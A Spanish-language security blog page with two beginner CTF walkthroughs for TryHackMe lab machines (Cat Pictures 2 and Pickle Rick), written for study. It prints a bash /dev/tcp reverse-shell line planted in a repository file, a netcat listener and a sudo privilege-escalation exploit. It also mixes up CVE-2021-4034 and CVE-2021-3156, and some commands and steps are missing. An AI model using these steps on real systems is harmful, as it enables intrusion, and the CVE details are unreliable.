Utilizando las credenciales descubiertas en los pasos anteriores, procedemos a acceder al servicio Gitea en el puerto 3000. Al explorar todo en Gitea, encontramos un repositorio local donde descubrimos la primera bandera.
Además, en el punto anterior, hay un puerto mencionado para acceder a otro apartado del servidor. Para aprovechar esta oportunidad, realizaremos una modificación en uno de los archivos encontrados en el repositorio para obtener un reverse shell.
Primero haz pruebas con los botones, veras que en los logs, hay uno que realiza una tarea con uno de los archivos encontrados en el repositorio, y podemos hacer una shell reversa para conseguir un primer acceso al servidor, visita el sitio web revshells.com y genera un codigo bash para el ataque, luego sustituye el command whoami por: bash -c «sh -i >& /dev/tcp/ip_maquina_atacante/puerto/ 0>&1» y guarda el archivo.
Mientras tanto, abre una escucha de Netcat en tu máquina atacante para recibir la conexión entrante del reverse shell. Utiliza el comando nc -lvnp <puerto> en tu máquina atacante, reemplazando <puerto> por el puerto que especificaste en el comando de reverse shell. Una vez abierto, ejecuta la tarea en la pagina de OliveTin.
Una vez que la tarea se haya ejecutado en el servidor, se establecerá una conexión de reverse shell desde el servidor objetivo a tu máquina atacante.
Ahora, tendrás acceso a una shell en el servidor objetivo a través de la conexión de reverse shell. Puedes interactuar con la shell y ejecutar comandos en el servidor.
Para mejorar la shell y tener una experiencia más cómoda, ejecuta el siguiente comando en la shell para iniciar una nueva instancia de bash:
script /dev/null -c bash
Con este proceso, podrás obtener acceso al servidor a través de un reverse shell y mejorar la shell para una mejor interacción.
Paso 8: Escalada de privilegios en Cat Pictures 2 TryHackMe
Una vez dentro de los repositorios en Gitea, busca la primera bandera y continúa explorando. Si es necesario, intenta escalar privilegios utilizando técnicas como sudo, suid o capabilities. Examina cuidadosamente las configuraciones de privilegios y busca posibles vulnerabilidades.
Paso 9: Búsqueda de vulnerabilidades con Linpeas
Si no se encuentra ninguna vulnerabilidad inmediata, procederemos a utilizar la herramienta Linpeas para explorar posibles vulnerabilidades ocultas en el sistema. Descarga el script linpeas.sh en tu máquina atacante ejecutando los siguientes comandos:
Paso 10: Explotación de la vulnerabilidad CVE-2021-4034 en Cat Pictures 2 TryHackMe
Si Linpeas no revela ninguna vulnerabilidad explotable, es posible que necesitemos buscar vulnerabilidades específicas. En este caso, se menciona una vulnerabilidad conocida, CVE-2021-4034, relacionada con la versión de sudo.
Clona el repositorio https://github.com/blasty/CVE-2021-3156 en tu máquina atacante y comprimelo en .tar, a continuación monta un servidor http con python3 -m http.server y desde la maquina victima descarga el archivo, así como descomprimir el .tar, sigue las instrucciones proporcionadas en el repositorio para aprovechar esta vulnerabilidad y elevar los privilegios a root.
¡Importante! Asegúrate de seguir las mejores prácticas de seguridad y obtener permiso antes de utilizar exploits en sistemas que no te pertenecen.
Conclusión Cat Pictures 2 TryHackMe
Una vez que hayas logrado elevar tus privilegios a root, habrás completado exitosamente el pentesting en la máquina Cat Pictures 2 de Try Hack Me. Recuerda documentar todas las etapas y resultados de tu proceso para futuras referencias.
Resumen Cat Pictures 2 TryHackMe
En este manual, hemos proporcionado una guía paso a paso para realizar una prueba de penetración en la máquina Cat Pictures 2 de Try Hack Me. Comenzamos con la preparación inicial, seguida de la actualización del sistema y la identificación de la máquina objetivo. Luego, realizamos un escaneo de puertos y enumeramos los directorios web en los servicios encontrados. Continuamos con el análisis de imágenes y metadatos, el acceso a Gitea y el descubrimiento de credenciales. Después, nos enfocamos en el escalamiento de privilegios y la búsqueda de vulnerabilidades ocultas utilizando Linpeas. Finalmente, exploramos una vulnerabilidad conocida (CVE-2021-4034) y concluimos el proceso.
Esta máquina Cat Pictures 2 de Try Hack Me ofrece un nivel de dificultad medio, lo que la convierte en un buen desafío para aquellos que se están iniciando en el pentesting. Te recomendamos seguir practicando y mejorando tus habilidades en este emocionante campo.
Si estás interesado en obtener más información sobre seguridad y pentesting, te invitamos a ponerte en contacto con nosotros en DCSeguridad. Nuestra empresa cuenta con expertos en seguridad que pueden ayudarte en tus proyectos y desafíos. También puedes unirte a nuestro canal de Telegram para mantenerte actualizado sobre las últimas noticias y recursos en el mundo de la seguridad.
¡Te deseamos buena suerte en tus futuras aventuras de pentesting!
En este manual, te guiaré a través de los pasos necesarios para realizar un pentesting en la máquina «Pickle Rick Try Hack Me https://tryhackme.com/room/picklerick«. Este tutorial está dirigido a personas que se están iniciando en el pentesting, por lo que explicaré los puntos más importantes y te mostraré cómo utilizar las herramientas clave durante el proceso. Asegúrate de seguir cada paso cuidadosamente para obtener resultados exitosos.
Paso 1: Actualizar el sistema operativo
Antes de comenzar con el pentesting, es crucial asegurarse de tener el sistema operativo actualizado. Ejecuta el siguiente comando para actualizar el sistema y sus paquetes a las versiones más recientes disponibles:
apt update && apt upgrade
Este comando garantiza que estés utilizando las últimas actualizaciones de seguridad y las versiones más recientes de los paquetes.
Paso 2: Preparar el entorno para Pickle Rick Try Hack Me
Crea una carpeta dedicada para trabajar con la máquina y asegúrate de tener todos los archivos relacionados en ella. Por ejemplo:
mkdir maquina
cd maquina
Esto creará una carpeta llamada «maquina» y te moverá al directorio recién creado.
Paso 3: Recopilar datos en un archivo de texto
Durante el proceso de pentesting, es esencial mantener un registro de los datos que encuentres. Crea un archivo de texto nuevo para almacenar la información relevante. Por ejemplo:
touch datos.txt
Esto creará un archivo de texto llamado «datos.txt» que puedes utilizar para guardar y organizar los hallazgos importantes.
Paso 4: Añadir la IP de la máquina al archivo host para Pickle Rick Try Hack Me
Para facilitar el acceso a la máquina, agregaremos su dirección IP al archivo de hosts de nuestro sistema. Esto se puede lograr modificando el archivo /etc/hosts y agregando una entrada para la dirección IP de la máquina.
Paso 5: Verificar la conectividad y el TTL
Antes de comenzar el escaneo de puertos, es importante verificar la conectividad con la máquina víctima y obtener información básica sobre ella. Utiliza el siguiente comando para enviar un paquete de ping a la dirección IP de la máquina:
ping -c 1 <ipmaquina>
Esto enviará un único paquete de ping a la dirección IP especificada. Luego, puedes verificar el TTL (Time To Live) en la respuesta del ping para obtener información adicional sobre la máquina.
Paso 6: Escaneo inicial con nmap de Pickle Rick Try Hack Me
El siguiente paso es realizar un escaneo inicial de puertos en la máquina utilizando la herramienta nmap. Ejecuta el siguiente comando:
nmap -A <ipmaquina> -oN nmap_picklerick_inicial
Este comando ejecuta un escaneo detallado de todos los puertos abiertos en la máquina y guarda los resultados en un archivo llamado «nmap_picklerick_inicial». El parámetro -A activa la detección de versiones y la detección de servicios.
Paso 7: Inspeccionar directorios con Gobuster
Para descubrir posibles directorios ocultos o archivos en la web de la máquina, utilizaremos la herramienta Gobuster. Ejecuta el
Este comando realiza un escaneo utilizando una lista de palabras clave contenida en el archivo «directory-list-2.3-medium.txt». La herramienta buscará archivos con las extensiones php, sh, txt, cgi, html, css, js y py.
Paso 8: Acceder a archivos encontrados y realizar inyección de comandos
Después de realizar el escaneo con Gobuster, es posible que hayas encontrado archivos como «robots.txt» y «login.php». Accede a estos archivos utilizando un navegador web o herramientas como curl o wget. Si encuentras una posible contraseña en alguno de los archivos, tómala nota y guárdala en tu archivo de datos para referencia futura.
Paso 9: Realizar un shell inverso en Pickle Rick Try Hack Me
Si has identificado un punto de inyección de comandos en la máquina, puedes aprovecharlo para establecer un shell inverso. Utiliza el siguiente comando PHP, reemplazando «ATTACKING-IP» por tu dirección IP de ataque:
Ahora tendrás control total sobre la máquina como root.
Paso 12: Búsqueda de ingredientes Pickle Rick Try Hack Me
Como usuario root en la máquina víctima, realiza una búsqueda de los tres ingredientes necesarios en los directorios relevantes utilizando comandos como find o grep. Guarda todos los hallazgos en tu archivo de datos para referencia futura.
¡Enhorabuena! Has completado el proceso de pentesting y has hackeado con éxito la máquina Pickle Rick.
Resumen
En este tutorial, hemos seguido una serie de pasos para realizar un pentesting en la máquina Pickle Rick. Comenzamos actualizando el sistema operativo, configurando el entorno de trabajo y recopilando datos en un archivo de texto. Luego, realizamos un escaneo de puertos con nmap, inspeccionamos directorios con Gobuster y accedimos a archivos encontrados. Utilizamos un shell inverso para obtener acceso a la máquina víctima, elevamos nuestros privilegios a root y buscamos los ingredientes necesarios. Al seguir estos pasos, logramos hackear con éxito la máquina Pickle Rick y obtener control total sobre ella.
¡Únete a DCSeguridad en Telegram!
Si estás interesado en el campo de la ciberseguridad y deseas obtener más información, te invitamos a unirte a nuestro canal de Telegram. En DCSeguridad, nos especializamos en ofrecer soluciones y servicios de seguridad avanzados para proteger tus activos digitales. No dudes en ponerse en contacto con nosotros para obtener asesoramiento o ayuda con tus necesidades de seguridad.
¡Asegúrate de visitar nuestro sitio web para obtener más información!
Para ofrecer las mejores experiencias, utilizamos tecnologías como las cookies para almacenar y/o acceder a la información del dispositivo. El consentimiento de estas tecnologías nos permitirá procesar datos como el comportamiento de navegación o las identificaciones únicas en este sitio. No consentir o retirar el consentimiento, puede afectar negativamente a ciertas características y funciones.
Funcional
Siempre activo
El almacenamiento o acceso técnico es estrictamente necesario para el propósito legítimo de permitir el uso de un servicio específico explícitamente solicitado por el abonado o usuario, o con el único propósito de llevar a cabo la transmisión de una comunicación a través de una red de comunicaciones electrónicas.
Preferencias
El almacenamiento o acceso técnico es necesario para la finalidad legítima de almacenar preferencias no solicitadas por el abonado o usuario.
Estadísticas
El almacenamiento o acceso técnico que es utilizado exclusivamente con fines estadísticos.El almacenamiento o acceso técnico que se utiliza exclusivamente con fines estadísticos anónimos. Sin un requerimiento, el cumplimiento voluntario por parte de tu proveedor de servicios de Internet, o los registros adicionales de un tercero, la información almacenada o recuperada sólo para este propósito no se puede utilizar para identificarte.
Marketing
El almacenamiento o acceso técnico es necesario para crear perfiles de usuario para enviar publicidad, o para rastrear al usuario en una web o en varias web con fines de marketing similares.